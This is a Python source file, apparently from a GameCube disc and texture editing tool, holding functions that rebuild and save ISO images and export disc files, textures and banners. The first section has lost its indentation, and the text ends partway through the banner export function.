iid = lowercaseIsoPath + '/' + newStrings[ index - 1 ].lower()
description, entity, isoOffset, origFileSize, isoPath, source, data = Gui.isoFileTree.item( iid, 'values' )
if source == 'path': # The data variable is a file path in this case.
newFileSize = os.path.getsize( data )
# Write the file to the new ISO (copying in chunks if it's a large file).
with open( data, 'rb' ) as externalFile:
for dataChunk in getInChunks( externalFile, 0, newFileSize, chunkSize ):
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
# Update this entry with its new offset and size
newEntries[ index ] = entry[:8] + newEntryOffset + "{0:0{1}X}".format( newFileSize, 8 )
elif source == 'ram': # The data variable is file data (a hex string) in this case.
newFileSize = len( data )/2
# Write the file to the new ISO
newIsoBinary.write( bytearray.fromhex(data) )
dataCopiedSinceLastUpdate += newFileSize
# Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
# Update this entry with its new offset and size
newEntries[ index ] = entry[:8] + newEntryOffset + "{0:0{1}X}".format( newFileSize, 8 )
else: # The file for this entry will be from the original ISO (source == 'iso').
origFileOffset = int( entry[8:16], 16 )
origFileSize = int( entry[16:24], 16 )
# Write the file to the new ISO (copying in chunks if it's a large file).
#print 'writing internal file', iid, 'to', hex( newIsoBinary.tell() )
for dataChunk in getInChunks( originalIsoBinary, origFileOffset, origFileSize, chunkSize ):
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
# Update this entry with its new offset
newEntries[ index ] = entry[:8] + newEntryOffset + entry[16:24]
if source != 'iso':
if isoOffset == '0': filesAdded.append( isoPath.lower() )
else: filesReplaced.append( isoPath.lower() )
# If auto padding was used, there should be a bit of padding left over to bring the file up to the standard GameCube disc size.
if buildingFromRootFolder and paddingSettingsValue == 'auto':
finalPadding = '00' * ( 1459978240 - int(newIsoBinary.tell()) )
newIsoBinary.write( bytearray.fromhex(finalPadding) )
# Now that all files have been written and evaluated, the new FST is ready to be assembled and written into the ISO.
updatedFstData = ''.join( newEntries ) + '\x00'.join( newStrings ).encode('hex')
newIsoBinary.seek( fstOffset )
newIsoBinary.write( bytearray.fromhex(updatedFstData) )
filesUpdated.append( gameId + '/game.toc' )
# Update the offset and size of the DOL and FST in boot.bin/iso.hdr
newIsoBinary.seek( 0x424 )
#newIsoBinary.write( toBytes( dolOffset ) ) # old slower method: bytearray.fromhex( "{0:0{1}X}".format(dolOffset, 8) )
newIsoBinary.write( toBytes( fstOffset ) )
newFstSizeBytes = toBytes( len(updatedFstData)/2 )
newIsoBinary.write( newFstSizeBytes ) # Writes the value for FST size
newIsoBinary.write( newFstSizeBytes ) # Writes the value for max FST size (the Apploader will be displeased if this is less than FST size)
# Remember that this file was updated
if gcrSystemFiles: filesUpdated.append( gameId + '/iso.hdr' )
else: filesUpdated.append( gameId + '/boot.bin' )
Gui.programStatusLabel.update() # Should show that sweet '100%' completion for a moment.
fileWriteSuccessful = True
except Exception as e:
print 'Error saving changes to disc (rebuild required = True);', e
# toc = time.clock()
# print 'Time to rebuild disc:', toc-tic
# Close files that may have been opened
if backupFile: backupFile.close()
if originalIsoBinary: originalIsoBinary.close() # not buildingFromRootFolder and
if not fileWriteSuccessful:
updateProgramStatus( 'Disc Save Error' )
if backupFile and os.path.exists( backupFile.name ): os.remove( backupFile.name ) # Delete the back-up file.
if buildingFromRootFolder: message = "Unable to build the disc."
else: message = "Unable to save or import into the " + discExt + ". \n\nBe sure that it is not being used by another \nprogram (like Dolphin :P)."
if tkMessageBox.askretrycancel( 'Problem While Saving', message ):
fileWriteSuccessful, filesReplaced, filesAdded = saveDiscChanges( newDiscPath )
else: # Save was successful
# Update the program status
updateStatus = False # Prevents the status from changing when the disc is reloaded, except in a special case below.
unsavedDiscChanges = []
if globalDatFile: globalDatFile.unsavedChanges = []
updateProgramStatus( 'Save Successful' )
# Change the background color of any edited entry widgets back to white. (Image Data Headers, Texture Struct properties, etc.) back to white.
if globalBannerFile and globalBannerFile.source == 'disc':
restoreEditedEntries( editedBannerEntries )
if globalDatFile and globalDatFile.source == 'disc':
restoreEditedEntries( editedDatEntries )
# If the disc needed to be rebuilt, there are new disc files that need to be renamed
if needsRebuilding:
if buildingFromRootFolder:
# Rename the backup file to the selected name (removing/replacing any existing file by that name).
try:
if os.path.exists( savePath ):
os.remove( savePath )
except:
msg( 'The file to replace could not be overwritten.\n\n'
"This can happen if the file is locked for editing (for example, if it's open in another program)." )
return False, 0, 0
os.rename( backupFile.name, savePath )
discFilePath = savePath
# If using the 'Save Disc As...' option
elif newDiscPath:
# Set the new disc path, and delete any existing file
try:
if os.path.exists( newDiscPath ):
os.remove( newDiscPath )
except:
msg( 'The file to replace could not be overwritten.\n\n'
"This can happen if the file is locked for editing (for example, if it's open in another program)." )
return False, 0, 0
# Move/rename the new (temp) file to the specified directory/name
os.rename( backupFile.name, newDiscPath )
discFilePath = newDiscPath
elif generalBoolSettings['backupOnRebuild'].get():
# Create a new, unique file name for the backup, with a version number based on the source file. e.g. '[original filename] - Rebuilt, v1.iso'
discFileName = os.path.basename( discFilePath )
if 'Rebuilt, v' in discFileName:
newIsoFilepath = discFilePath
else:
newIsoFilepath = discFilePath[:-4] + ' - Rebuilt, v1' + discExtOriginal
# Make sure this is a unique (new) file path
if os.path.exists( newIsoFilepath ):
nameBase, _, version = newIsoFilepath[:-4].rpartition( 'v' ) # Splits on last instance of the delimiter (once)
if '.' in version: # e.g. "1.3"
# Get the most minor number in the version
versionBase, _, _ = version.rpartition( '.' )
newIsoFilepath = '{}v{}.1{}'.format( nameBase, versionBase, discExtOriginal )
newMinorVersion = 2
while os.path.exists( newIsoFilepath ):
newIsoFilepath = '{}v{}.{}{}'.format( nameBase, versionBase, newMinorVersion, discExtOriginal )
newMinorVersion += 1
else: # Single number version
newIsoFilepath = '{}v1{}'.format( nameBase, discExtOriginal )
newMajorVersion = 2
while os.path.exists( newIsoFilepath ):
newIsoFilepath = '{}v{}{}'.format( nameBase, newMajorVersion, discExtOriginal )
newMajorVersion += 1
# Rename the backup file to the above name.
os.rename( backupFile.name, newIsoFilepath )
# Inform the user that a backup was created, and prompt if they'd like to switch to it.
if tkMessageBox.askyesno( 'Load Back-up?', 'The rebuilt disc was saved as a back-up. Would you like to load it now?' ):
updateStatus = True
discFilePath = newIsoFilepath
# Performing a basic save (no back-ups)
else:
# Rename the original file, rename the back-up to the original file's name. Then, if successful, delete the original file.
try:
os.rename( discFilePath, discFilePath + '.bak' ) # Change the name of the original file so the new file can be named to it. Not deleted first in case the op below fails.
os.rename( backupFile.name, discFilePath ) # Rename the new 'back-up' file to the original file's name.
os.remove( discFilePath + '.bak' ) # Delete the original file.
except:
msg('A back-up file was successfully created, however there was an error while attempting to rename the files and remove the original.\n\n'
"This can happen if the original file is locked for editing (for example, if it's open in another program).")
return False, 0, 0
if fileWriteSuccessful:
# Reload the file to get the new properties, such as file offsets and sizes, and to reset descriptions and source info.
if buildingFromRootFolder: updatedFiles = None # No reason to highlight all the files; it's implied they're all "new/updated" since it's a new disc.
else: updatedFiles = filesReplaced + filesAdded + filesUpdated
rememberFile( discFilePath, False )
globalDiscDetails['isoFilePath'] = discFilePath
scanDisc( updateStatus, preserveTreeState=True, switchTab=False, updatedFiles=updatedFiles )
# Warn the user if an ISO is too large for certain loaders
isoByteSize = os.path.getsize( discFilePath )
if isoByteSize > 1459978240: # This is the default/standard size for GameCube discs.
msg( 'The disc is larger than the standard size for GameCube discs (which is ~1.36 GB, or 1,459,978,240 bytes). This will be a problem for Nintendont, but discs up to 4 GB '
'should still work fine for both Dolphin and DIOS MIOS. (Dolphin may still play discs larger than 4 GB, but some features may not work.)', 'Standard Disc Size Exceeded' )
return fileWriteSuccessful, filesReplaced, filesAdded # files replaced will always count the FST if a rebuild was required
def saveDatAs():
	""" Prompts for a destination and saves the currently loaded DAT file there as a standalone file.
		Overwrites an existing file, or creates a new one if none exists by that name. """
	if globalDatFile:
		# A DAT is loaded; ask the user where to put it and write it out
		saveDataToFileAs( globalDatFile.getFullData(), globalDatFile )
	else:
		msg( "This operation is for a DAT file that has already been loaded in the DAT Texture Tree tab. "
			 "If you'd like to save a file that's in a disc to a standalone file, use the 'Export' feature." )
def saveBannerAs():
	""" Prompts for a destination and saves the currently loaded banner file there as a standalone file.
		Overwrites an existing file, or creates a new one if none exists by that name. """
	if globalBannerFile:
		# A banner is loaded; ask the user where to put it and write it out
		saveDataToFileAs( globalBannerFile.data, globalBannerFile )
	else:
		msg( "This operation is for a banner file that has already been loaded in the Disc Details tab. "
			 "If you'd like to save a file that's in a disc to a standalone file, use the 'Export' feature." )
def saveDataToFileAs( datData, datFile ):
	""" Prompts the user for a save location and writes datData there. On success, the file object's
		path/source/name are repointed to the new file, and GUI references to the old name are refreshed. """

	# Ask the user where they'd like to save the file
	fileExt = os.path.splitext( datFile.fileName )[1].replace('.', '')
	destinationPath = tkFileDialog.asksaveasfilename(
		title="Where would you like to export the file?",
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		initialfile=datFile.fileName,
		defaultextension=fileExt,
		filetypes=[( fileExt.upper() + " files", '*.' + fileExt.lower() ), ( "All files", "*.*" )] ) #confirmoverwrite ?
	if not destinationPath:
		return # User canceled the dialog

	# Remember this directory as the default for future open/export dialogs
	settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname( destinationPath ) )
	with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )

	saveSuceeded = writeDatFile( destinationPath, datData, 'Save', datFile )
	if not saveSuceeded:
		return # writeDatFile handles reporting the failure

	# The write worked; repoint the loaded file object at the newly created file
	previousFileName = datFile.fileName
	updatedFileName = os.path.basename( destinationPath )
	datFile.path = destinationPath
	datFile.source = 'file'
	datFile.fileName = updatedFileName

	# Refresh external references (shown on the GUI)
	Gui.datDestination.set( destinationPath )
	if len( updatedFileName ) > 30: updatedFileName = updatedFileName[:27] + '...' # Truncate long names for display
	Gui.fileStructureTree.heading( '#0', anchor='center', text=updatedFileName ) # SA tab

	# If the old file name is displayed in the SA tab's property pane, update that too
	structPropertiesChildren = Gui.structurePropertiesFrame.interior.winfo_children()
	if structPropertiesChildren:
		labelWidget = structPropertiesChildren[0]
		if labelWidget.winfo_class() == 'TLabel' and labelWidget['text'] == previousFileName:
			labelWidget['text'] = updatedFileName

	# Add the new file to the recent files menu
	#rememberFile( destinationPath )
def getDiscPath( iid, isoPath='', includeRoot=True ):
	""" Builds a disc path, like isoPath, but includes convenience folders if they are turned on.

			iid: 			treeview item id of the file in the Disc File Tree
			isoPath: 		the file's path within the disc (looked up from the treeview if not given)
			includeRoot: 	whether the returned path should start with the disc's root (Game ID) segment """

	if not isoPath:
		isoPath = Gui.isoFileTree.item( iid, 'values' )[-3] # isoPath is third-from-last among the item's values

	if generalBoolSettings['useDiscConvenienceFolders'].get():
		# Scan for 'convenience folders' (those not actually in the disc), and add them to the path; they won't exist in isoPath
		root = globalDiscDetails['gameId'].lower()
		isoParts = isoPath.split( '/' )
		pathParts = [ isoParts[-1] ] # A list, starting with just the filename

		# Walk up the treeview hierarchy to the root, collecting (sanitized) folder names along the way
		parentIid = Gui.isoFileTree.parent( iid )
		while parentIid != root:
			parentFolderText = Gui.isoFileTree.item( parentIid, 'text' ).strip()
			for character in ( '\\', '/', ':', '*', '?', '"', '<', '>', '|' ): # Remove illegal characters
				parentFolderText = parentFolderText.replace( character, '-' )
			pathParts.insert( 0, parentFolderText )
			parentIid = Gui.isoFileTree.parent( parentIid )

		if includeRoot:
			pathParts.insert( 0, isoParts[0] ) # The Game ID segment
		return '/'.join( pathParts )

	elif not includeRoot:
		return '/'.join( isoPath.split('/')[1:] ) # Removes the GameID
	else:
		return isoPath
def exportItemsInSelection( selection, iidSelectionsTuple, isoBinary, directoryPath, exported, failedExports ):
	""" Basically just a recursive helper function to exportIsoFiles(). Exports every file
		among the given treeview items, recursing into folders.

			selection: 			treeview iids to process on this pass
			iidSelectionsTuple: the user's original selection (used to avoid exporting a file twice)
			isoBinary: 			the opened disc image file object
			directoryPath: 		root output directory chosen by the user
			exported/failedExports: running tallies; returned updated as ( exported, failedExports ) """

	for iid in selection:
		# Prevent files from being exported twice depending on user selection
		if (selection != iidSelectionsTuple) and iid in iidSelectionsTuple:
			continue

		_, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( iid, 'values' )

		if entity == 'file':
			Gui.programStatus.set( 'Exporting File ' + str(exported + failedExports + 1) + '....' )
			Gui.programStatusLabel.update()

			try:
				# Retrieve the file data.
				if source == 'iso':
					isoBinary.seek( int(isoOffset, 16) )
					datData = bytearray( isoBinary.read( int(fileSize) ) )
				elif source == 'ram':
					datData = bytearray.fromhex( data )
				else: # source == 'path', meaning data is a filepath to an external file
					with open( data, 'rb') as externalFile:
						datData = bytearray( externalFile.read() )

				# Construct a file path for saving, and destination folders if they don't exist
				savePath = directoryPath + '/' + getDiscPath( iid, isoPath, includeRoot=False )
				createFolders( os.path.split(savePath)[0] )

				# Save the data to a new file.
				with open( savePath, 'wb') as newFile:
					newFile.write( datData )
				exported += 1

			# Count the failure and continue with the rest of the selection. Narrowed from a
			# bare 'except:', which would also swallow KeyboardInterrupt/SystemExit.
			except Exception:
				failedExports += 1

		else: # Item is a folder; recurse into its children
			exported, failedExports = exportItemsInSelection( Gui.isoFileTree.get_children(iid), iidSelectionsTuple, isoBinary, directoryPath, exported, failedExports )

	return exported, failedExports
def exportIsoFiles():
	""" Exports the files/folders currently selected in the Disc File Tree. A single file
		selection prompts for a full save path; multiple selections (or a folder) prompt
		for a destination directory and export recursively via exportItemsInSelection(). """

	if not discDetected(): return

	iidSelectionsTuple = Gui.isoFileTree.selection()

	# Validate the selection and confirm the disc image can still be found
	if not iidSelectionsTuple:
		updateProgramStatus( 'Eh?' )
		msg( 'Please first select a file or folder to export.' )
		return
	elif globalDiscDetails['isoFilePath'] == '' or not os.path.exists( globalDiscDetails['isoFilePath'] ):
		updateProgramStatus( 'Export Error' )
		msg( "Unable to find the disc image. Be sure that the file path is correct and that the file has not been moved or deleted.", 'Disc Not Found' )
		return

	_, entity, isoOffset, fileSize, isoPath, source, data = Gui.isoFileTree.item( iidSelectionsTuple[0], 'values' )

	# Check the selection to determine if a single or multiple files need to be exported
	if len( iidSelectionsTuple ) == 1 and entity == 'file':
		# Prompt for a place to save the file.
		fileName = '-'.join( isoPath.split('/')[1:] ) # Removes the GameID, and separates directories with dashes
		ext = os.path.splitext( fileName )[1].replace('.', '')
		savePath = tkFileDialog.asksaveasfilename(
			title="Where would you like to export the file?",
			initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
			#initialfile=filenameWithNoExt + ' (from ' + isoFilenameWithNoExt + ')',
			initialfile=fileName,
			defaultextension=ext,
			filetypes=[( ext.upper() + " files", '*.' + ext.lower() ), ( "All files", "*.*" )] ) #confirmoverwrite ?

		# If the above wasn't canceled and returned a path, use that to save the file
		if savePath:
			directoryPath = os.path.dirname( savePath ) # Used at the end of this function

			# Get the file's data and write it to an external file
			datData = getFileDataFromDiscTreeAsBytes( iidValues=(entity, isoOffset, fileSize, source, data) )
			writeDatFile( savePath, datData, 'Export' )

		else: directoryPath = ''

	else: # Multiple files selected to be exported. Prompt for a directory to save them to.
		directoryPath = tkFileDialog.askdirectory(
			title='Where would you like to save these files?',
			initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
			parent=Gui.root,
			mustexist=True )

		if directoryPath != '':
			exported = 0
			failedExports = 0

			# Walk the selection (recursing into folders) and export each file
			with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
				exported, failedExports = exportItemsInSelection( iidSelectionsTuple, iidSelectionsTuple, isoBinary, directoryPath, exported, failedExports )

			if failedExports == 0: updateProgramStatus( 'Export Successful' )
			else:
				updateProgramStatus( 'Failed Exports' ) # writeDatFile will otherwise update this with success.
				if exported > 0:
					msg( str(exported) + ' files exported successfully. However, ' + str(failedExports) + ' files failed to export.' )
				else: msg( 'Unable to export.' )

	if directoryPath:
		# Update the default directory to start in when opening or exporting files.
		settings.set( 'General Settings', 'defaultSearchDirectory', directoryPath )
		with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
def exportTexturesInSelection( selection, iidSelectionsTuple, isoBinary, chosenSaveDirectory, exported, failedExports, exportFormat ):
	""" Basically just a recursive helper function to exportSelectedFileTextures().
		Loads each selected file, finds all textures in it, and exports them in the given format.

			selection: 			treeview iids to process on this pass
			iidSelectionsTuple: the user's original selection (used to avoid processing a file twice)
			isoBinary: 			the opened disc image file object
			chosenSaveDirectory: root output directory chosen by the user
			exported: 			running count of textures exported
			failedExports: 		running list of filenames that failed or were skipped
			exportFormat: 		'png' or 'tpl'

		Returns the updated ( exported, failedExports ) tallies. """

	for iid in selection:
		# Prevent files from being exported twice depending on user selection
		if (selection != iidSelectionsTuple) and iid in iidSelectionsTuple:
			continue

		_, entity, _, _, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )

		if entity == 'file':
			Gui.programStatus.set( 'Exporting from file ' + str(exported + len(failedExports) + 1) + '....' )
			Gui.programStatusLabel.update()

			try:
				# Initialize the file and collect textures from it
				fileData = getFileDataFromDiscTreeAsBytes( iid )
				datFile = hsdFiles.datFileObj( source='disc' )
				datFile.load( iid, fileData, os.path.basename(isoPath) )

				# Skip unrecognized files (or those appearing to have unreasonable basic features)
				if datFile.headerInfo['rootNodeCount'] > 300 or datFile.headerInfo['referenceNodeCount'] > 300 or datFile.headerInfo['rtEntryCount'] > 45000:
					print 'Skipping texture export from', iid + '; unreasonable file'
					failedExports.append( isoPath.split('/')[-1] )
					continue
				elif len( datFile.rtData ) > 200000:
					print 'Skipping texture export from', iid + '; unrecognized file'
					failedExports.append( isoPath.split('/')[-1] )
					continue

				# Construct the file path and create any folders needed
				saveDirectory = chosenSaveDirectory + '/' + getDiscPath( iid, isoPath, includeRoot=False )
				createFolders( saveDirectory )

				# Export all textures that can be found in this file
				for imageDataOffset, _, _, _, width, height, imageType, _ in identifyTextures( datFile ):
					# Get the image data
					imageDataLength = hsdStructures.ImageDataBlock.getDataLength( width, height, imageType )
					imageData = datFile.getData( imageDataOffset, imageDataLength )

					# Add the texture file name to the save path
					textureDetails = ( imageDataOffset, imageDataLength, width, height, imageType )
					savePath = saveDirectory + '/' + constructTextureFilename( datFile, iid, textureDetails=textureDetails ) + '.' + exportFormat

					# Collect any palette data (only these palette-based image types need one)
					if imageType == 8 or imageType == 9 or imageType == 10:
						paletteData, paletteType = getPaletteData( datFile, imageDataOffset, imageData=imageData, imageType=imageType )
						if not paletteData:
							print 'Skipping', iid + '; a color palette could not be found'
							continue
					else:
						paletteData = ''
						paletteType = None

					# Save the image to file
					if exportFormat == 'tpl':
						tplImage = tplEncoder( imageDimensions=(width, height), imageType=imageType, paletteType=paletteType )
						tplImage.encodedImageData = imageData
						tplImage.encodedPaletteData = paletteData
						tplImage.createTplFile( savePath )
					elif exportFormat == 'png': # Decode the image data
						pngImage = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
						pngImage.deblockify()
						pngImage.createPngFile( savePath, creator='DTW - v' + programVersion )
					exported += 1

			except Exception as err:
				print 'Failed exporting textures from', iid
				print err
				failedExports.append( isoPath.split('/')[-1] )

		else: # Item is a folder; recurse into its children
			exported, failedExports = exportTexturesInSelection( Gui.isoFileTree.get_children(iid), iidSelectionsTuple, isoBinary, chosenSaveDirectory, exported, failedExports, exportFormat )

	return exported, failedExports
def exportSelectedFileTextures():
	""" Exports all textures within all selected files/folders in the Disc File Tree. """

	if not discDetected(): return

	# Get and validate the export format to be used.
	exportFormat = settings.get( 'General Settings', 'textureExportFormat' ).lower().replace( '.', '' )
	if exportFormat != 'png' and exportFormat != 'tpl':
		msg( 'The default export format setting (textureExportFormat) is invalid! The format must be PNG or TPL.' )
		return

	# Validate the selection and confirm the disc image can still be found
	iidSelectionsTuple = Gui.isoFileTree.selection()
	if not iidSelectionsTuple:
		updateProgramStatus( 'Eh?' )
		msg( 'Please first select a file or folder to export.' )
		return
	elif globalDiscDetails['isoFilePath'] == '' or not os.path.exists( globalDiscDetails['isoFilePath'] ):
		updateProgramStatus( 'Export Error' )
		msg( "Unable to find the disc image. Be sure that the file path is correct and that the file has not been moved or deleted.", 'Disc Not Found' )
		return

	# Prompt for a directory to save them to.
	chosenSaveDirectory = tkFileDialog.askdirectory(
		title='Where would you like to save these textures?',
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		parent=Gui.root,
		mustexist=True )

	if chosenSaveDirectory != '': # Empty if the dialog was canceled
		exported = 0
		failedExports = [] # Collects names of files whose textures failed to export

		with open( globalDiscDetails['isoFilePath'], 'rb') as isoBinary:
			exported, failedExports = exportTexturesInSelection( iidSelectionsTuple, iidSelectionsTuple, isoBinary, chosenSaveDirectory, exported, failedExports, exportFormat )

		if len( failedExports ) == 0:
			updateProgramStatus( 'Export Successful' )
		else:
			updateProgramStatus( 'Failed Exports' ) # writeDatFile will otherwise update this with success.
			if exported > 0:
				msg( str(exported) + ' files exported their textures successfully. However, these files failed their export:\n\n' + '\n'.join(failedExports) )
			else: msg( 'Unable to export.' )

		# Update the default directory to start in when opening or exporting files.
		settings.set( 'General Settings', 'defaultSearchDirectory', chosenSaveDirectory )
		with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )
def writeDatFile( savePath, datData, operation, datFileObj=None ):
	""" Writes the given file data to an external file, and updates the program status.

			savePath: 	full path for the output file
			datData: 	the data to write
			operation: 	verb used in the status message, e.g. 'Save' or 'Export'
			datFileObj: if provided, its unsaved-changes list is cleared on success

		Returns True on success, False otherwise. """

	try:
		with open( savePath, 'wb') as newFile:
			newFile.write( datData )

		if datFileObj:
			# Record that the changes have been saved.
			datFileObj.unsavedChanges = []
			if savePath.lower().endswith( '.bnr' ):
				restoreEditedEntries( editedBannerEntries )
			else:
				restoreEditedEntries( editedDatEntries )

		# Update the program status.
		updateProgramStatus( operation + ' Successful' )
		successStatus = True

	# Narrowed from a bare 'except:', which would also swallow KeyboardInterrupt/SystemExit
	except Exception:
		updateProgramStatus( operation + ' Error' )
		fileExt = os.path.splitext( savePath )[1].upper()
		msg( "There was an unknown problem while creating the {} file.".format(fileExt) )
		successStatus = False

	return successStatus
def constructTextureFilename( datFile, iid='', filepath='', textureDetails=(), forceDolphinHash=False ):
	""" Generates a file name for textures exported from DAT files (not used for banners).
		The file extension is not included.

			datFile: 			the file object containing the texture
			iid: 				treeview item id; used to look up texture details if textureDetails isn't given
			filepath: 			alternative identifier to iid (one of the two must be provided)
			textureDetails: 	optional ( imageDataOffset, imageDataLength, width, height, imageType )
			forceDolphinHash: 	if True, use Dolphin's hash-based naming regardless of the user setting """

	# Validate the input
	if not iid and not filepath:
		msg( 'constructTextureFilename requires an iid or filepath!' )
		return ''

	# Get or unpack information on the texture
	if not textureDetails: textureDetails = parseTextureDetails( iid )
	imageDataOffset, imageDataLength, width, height, imageType = textureDetails

	if not forceDolphinHash and not generalBoolSettings['useDolphinNaming'].get(): # Use DTW's standard naming convention
		# 0x20 is added to the offset, matching the offset-display convention used elsewhere in this file
		filename = '{}_0x{:X}_{}'.format( datFile.fileName, 0x20+imageDataOffset, imageType )

	else: # Use Dolphin's file naming convention
		mipmapLevel = getMipmapLevel( iid )

		# Generate a hash on the encoded texture data
		imageData = datFile.getData( imageDataOffset, imageDataLength )
		tex_hash = xxhash.xxh64( bytes(imageData) ).hexdigest() # Requires a byte string; can't use bytearray

		# Generate a hash on the encoded palette data, if it exists
		if imageType == 8 or imageType == 9 or imageType == 10:
			# Get the palette data, and generate a hash from it
			paletteData = getPaletteData( datFile, imageDataOffset, imageData=imageData, imageType=imageType )[0]
			tlut_hash = '_' + xxhash.xxh64( bytes(paletteData) ).hexdigest() # Requires a byte string; can't use bytearray
		else:
			tlut_hash = ''

		# Format mipmap flags
		if mipmapLevel == -1: # Not a mipmaped texture
			# Assemble the finished filename, without file extension
			filename = 'tex1_' + str(width) + 'x' + str(height) + '_' + tex_hash + tlut_hash + '_' + str(imageType)
		else:
			if mipmapLevel > 0:
				mipLevel = '_mip' + str( mipmapLevel )
			else: mipLevel = ''

			# Assemble the finished filename, without file extension
			filename = 'tex1_' + str(width) + 'x' + str(height) + '_m_' + tex_hash + tlut_hash + '_' + str(imageType) + mipLevel

	return filename
def exportTextures( exportAll=False ):
	""" Exports some (what's selected) or all textures from the DAT Texture Tree.

			exportAll: if True, export every texture in the tree rather than just the selection

		The export format ('png' or 'tpl') comes from the textureExportFormat setting; for
		a single texture the user may override it via the extension of the chosen filename. """

	# Get a list of the items in the treeview to export
	if exportAll:
		iidSelectionsTuple = Gui.datTextureTree.get_children()
	else: iidSelectionsTuple = Gui.datTextureTree.selection()

	# Make sure there are textures selected to export, and a file loaded to export from
	if not iidSelectionsTuple or not globalDatFile:
		msg( 'No texture is selected.' )
		return

	# Get and validate the export format to be used.
	exportFormat = settings.get( 'General Settings', 'textureExportFormat' ).lower().replace( '.', '' )
	if exportFormat != 'png' and exportFormat != 'tpl':
		msg( 'The default export format setting (textureExportFormat) is invalid! The format must be PNG or TPL.' )
		return

	directoryPath = ''
	textureFilename = ''
	problemFiles = []
	workingFile = 1

	if len( iidSelectionsTuple ) == 1:
		defaultFilename = constructTextureFilename( globalDatFile, iidSelectionsTuple[0] )
		if exportFormat == 'png': filetypes = [('PNG files', '*.png'), ('TPL files', '*.tpl'), ("All files", "*.*")]
		else: filetypes = [('TPL files', '*.tpl'), ('PNG files', '*.png'), ("All files", "*.*")]

		validExt = False
		while not validExt:
			# Prompt for a filename, and a place to save the file.
			savePath = tkFileDialog.asksaveasfilename(
				title="Where would you like to export the file?",
				initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
				initialfile=defaultFilename,
				defaultextension='.' + exportFormat,
				filetypes=filetypes)

			# Check the extension to see if it's valid (or just exit the loop if cancel was pressed).
			exportFormat = savePath[-3:].lower()
			if exportFormat == 'png' or exportFormat == 'tpl' or savePath == '': validExt = True
			else: msg( 'Textures may only be exported in PNG or TPL format.' )

		# Bug fix: bail out if the dialog was canceled. Previously the export loop still ran with
		# empty directoryPath/textureFilename, attempting to write to a root-level '/<name>' path.
		if not savePath:
			return

		# Get the directory and filename chosen for the file
		directoryPath = os.path.dirname( savePath )
		textureFilename = os.path.basename( savePath )

	else: # Multiple textures selected for export
		directoryPath = tkFileDialog.askdirectory( # Instead of having the user choose a file name and save location, have them choose just the save location.
			title='Where would you like to save these textures?',
			initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
			parent=Gui.root,
			mustexist=True)

		if not directoryPath: # The dialog box was canceled
			return

	for iid in iidSelectionsTuple:
		# Set us up the GUI
		Gui.programStatus.set( 'Exporting Texture ' + str(workingFile) + '....' )
		Gui.programStatusLabel.update()
		workingFile += 1

		# Collect data/info on this texture
		textureDetails = imageDataOffset, imageDataLength, width, height, imageType = parseTextureDetails( iid )
		imageData = globalDatFile.getData( imageDataOffset, imageDataLength )

		# Construct a filepath/location to save the image to
		if textureFilename: # May be a custom name from the user if only one texture is being exported.
			savePath = directoryPath + '/' + textureFilename
		else:
			savePath = directoryPath + '/' + constructTextureFilename( globalDatFile, iid, textureDetails=textureDetails ) + '.' + exportFormat

		# Collect the palette data, if needed (only these palette-based image types have one)
		if imageType == 8 or imageType == 9 or imageType == 10:
			paletteData, paletteType = getPaletteData( globalDatFile, imageDataOffset, imageData=imageData, imageType=imageType )
			if not paletteData:
				msg( 'A color palette could not be found for the texture at offset ' + uHex(0x20+imageDataOffset) + '. This texture will be skipped.' )
				continue
		else:
			paletteData = ''
			paletteType = None

		try: # Save the file to be exported
			if exportFormat == 'tpl':
				tplImage = tplEncoder( imageDimensions=(width, height), imageType=imageType, paletteType=paletteType )
				tplImage.encodedImageData = imageData
				tplImage.encodedPaletteData = paletteData
				tplImage.createTplFile( savePath )
			elif exportFormat == 'png': # Decode the image data
				pngImage = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
				pngImage.deblockify()
				pngImage.createPngFile( savePath, creator='DTW - v' + programVersion )
		except Exception: # Narrowed from a bare 'except:' to avoid swallowing KeyboardInterrupt
			problemFiles.append( os.path.basename(savePath) )

	# Finished with file export/creation loop.
	# Update the default directory to start in when opening or exporting files.
	settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(savePath) )
	with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )

	# Give an error message for any problems encountered.
	if problemFiles:
		msg( "There was an unknown problem while exporting these files:\n\n" + '\n'.join(problemFiles) )
		updateProgramStatus( 'Export Error' )
	else: updateProgramStatus( 'Export Successful' )
def exportBanner( event ):
	""" Exports the banner image from the currently loaded banner file, in PNG or TPL format.
		Bound as a GUI event handler; the event argument is unused. """

	if not globalBannerFile or not globalBannerFile.data:
		msg( 'No banner file or disc appears to be loaded.', 'Cannot Export Banner Image' )
		return

	# Default name follows the texture naming convention of <fileName>_<offset>_<imageType>
	defaultFilename = globalBannerFile.fileName + '_0x20_5'

	# Prompt for a place to save the file
	validExt = False
	while not validExt:
		# Prompt for a filename, and a place to save the file.
		savePath = tkFileDialog.asksaveasfilename(
			title="Where would you like to export the file?",
			initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
			initialfile=defaultFilename,
			defaultextension='.png',
			filetypes=[('PNG files', '*.png'), ('TPL files', '*.tpl'), ("All files", "*.*")])

		# Check the extension to see if it's valid (or just exit the loop if cancel was pressed).
